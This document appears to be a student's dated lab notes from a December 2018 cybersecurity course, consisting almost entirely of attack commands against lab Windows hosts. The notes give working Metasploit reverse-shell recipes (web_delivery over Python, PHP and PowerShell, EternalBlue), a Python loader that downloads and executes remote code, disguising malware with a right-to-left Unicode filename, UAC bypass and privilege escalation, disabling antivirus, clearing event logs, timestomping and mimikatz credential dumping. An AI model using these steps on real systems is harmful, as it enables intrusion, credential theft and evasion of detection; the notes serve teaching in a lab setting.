rdesktop -g 1280x1024 172.16.50.96

03.12.2018 - week 3 of cyber
OSF forensics - a tool for forensics

05.12.2018
I wasn't there

07.12.2018
I wasn't there

10.12.2018
Setting up a malware reverse shell via:
regsvr32 /s /n /u /i:http://172.16.65.141:8080/.sct scrobj.dll
task scheduler run persistence (in metasploit)
Creating malware on the Go platform / language
right-to-left unicode
jpg to ico #online convert
change the file icon with the malware icon file created

Installing Python on Windows: download the .exe or .msi installer
Setup variables in Windows: in System Properties, Advanced, Environment Variables, System variables, Path (;C:\Python27)
Install pip:
cd C:\Python27\Scripts
pip.exe install pyinstaller | dir | check if pip.exe install pyinstaller is there
Setup variables in Windows: in System Properties, Advanced, Environment Variables, System variables, edit variable value: ;C:\Python27\;C:\Python27\Scripts
cd C:\Users\Lab\Desktop
pyinstaller --onefile mlw.py --icon img.ico
copy the right-to-left symbol from Character Map
rename mlw.exe to mlwgnp.exe, then paste the character in front of png.exe #it turns it into mlwexe.png
C:/python2.7\Tools\scripts> --ico

msf > use exploit/multi/script/web_delivery
> show targets
> set target 0
> set payload python/meterpreter/reverse_tcp
> set lhost 172.16.65.141
> set uripath /
> exploit
in a new terminal ../ #to execute, gives us a session :)

edit mlw.py:
import sys
import urllib2
r = urllib2.urlopen("http://172.16.60.99:8080/")
exec(r.read())

To transfer to Windows: python -m SimpleHTTPServer 80
C:> python mlw.py #gives you a session
##now compile to exe
c:> pyinstaller --onefile mlw.py
wget http://172.16.60.99:8080
echo "paste content of index.html" | base64 -d
copy the content of the script found
nano mlw2.py / paste script here
python mlw2.py / gives you a session
cp to /var/www
copy to Windows
pyinstaller --onefile mlw2.py #from the location where the file is downloaded
cd dist
mlw2.exe #to execute
##error when executing on Windows, script problem
fuser -k 80/tcp
msf > use exploit/multi/script/web_delivery
> show targets
> set target 3
> set lhost 172.16.65.141
> set uripath /
> set payload windows/meterpreter/reverse_tcp
> exploit
sessions
sessions -i
getuid
run persistence --help
> use exploit/multi/handler

12.12.2018
## getting a session with metasploit via PHP
use multi/script/web_delivery
show targets
set target 1
set lhost xx
set payload php/meterpreter/reverse_tcp
set uripath /
exploit
##generates some output string; in a new terminal execute php -d "script", the session comes :)
##debug what is happening
**single stage attack
nano info.txt / paste script
wget http://172.16.50.161:8080/
cat index.html
mv index.html index.php
firefox http://127.0.0.1/ the session comes :)
sessions -i
sessions -k 2

## getting a session with metasploit via PSH
set target 2
show options
set payload windows/meterpreter/reverse_tcp
show options
jobs -k
exploit /generates a link
nano file / paste the link
nano index.html / paste the url
browse 172.16.50.161 / copy the link
in cmd paste the link :) gives you a session
sessions -i x
getuid
> run post/windows/manage/enable_rdp
> run post/windows/manage/ (menu of options)

##payload_inject
## duplicates an existing session
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lport xx
> set lhost xx
> exploit -j #silent
meterpreter> background
> run post/windows/manage/payload_inject
> set payload windows/meterpreter/reverse_tcp
> set lport xx
> set lhost xx
> set session x
> exploit :) duplicates the session
meterpreter> getuid
meterpreter> shell
meterpreter> background
> use exploit/windows/local/bypassuac
> set session 1
> exploit
> set lport xx
> show advanced
> exploit :) gives you a session
meterpreter> getuid
meterpreter> getsystem
meterpreter> getuid
meterpreter> show_mount
meterpreter> ps #process list

##clearing the logs and the importance of logs
meterpreter> clearev #clear logs
## read from memory, read live credentials
meterpreter> kiwi ## explore the tool, similar to mimikatz
meterpreter> lsa_dump_sam
meterpreter> load mimikatz
## importance of file access time and file modification time
meterpreter> timestomp nc.exe ##find files recently accessed, it modified the time used
**SIEM analysis
**malware analysis
**behavior analysis

## ask injection
meterpreter> background
> use exploit/windows/local/ask
> set lhost
> set lport
> exploit
meterpreter> getuid
meterpreter> getsystem
> exploit

##Unicorn.py
python unicorn.py windows/meterpreter/reverse_tcp 172.16.59.161 666 macro
msfconsole -r unicorn.rc
cat powershell_attack.txt

14.12.2018
## malware of the future
## AI
## polymorphic malware, to read during the holiday
## autorun script resource
## read from a file in msfconsole
eternalblue:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost IP
set lport port

use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set EXITFUNC thread
set LHOST localhost
set LPORT 4445
set AutoRunScript post/windows/manage/killav
exploit -j

msf > use exploit/multi/script/web_delivery
> set TARGET 3
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST
> show options
> exploit
sessions -c "command"
sessions -c "whoami"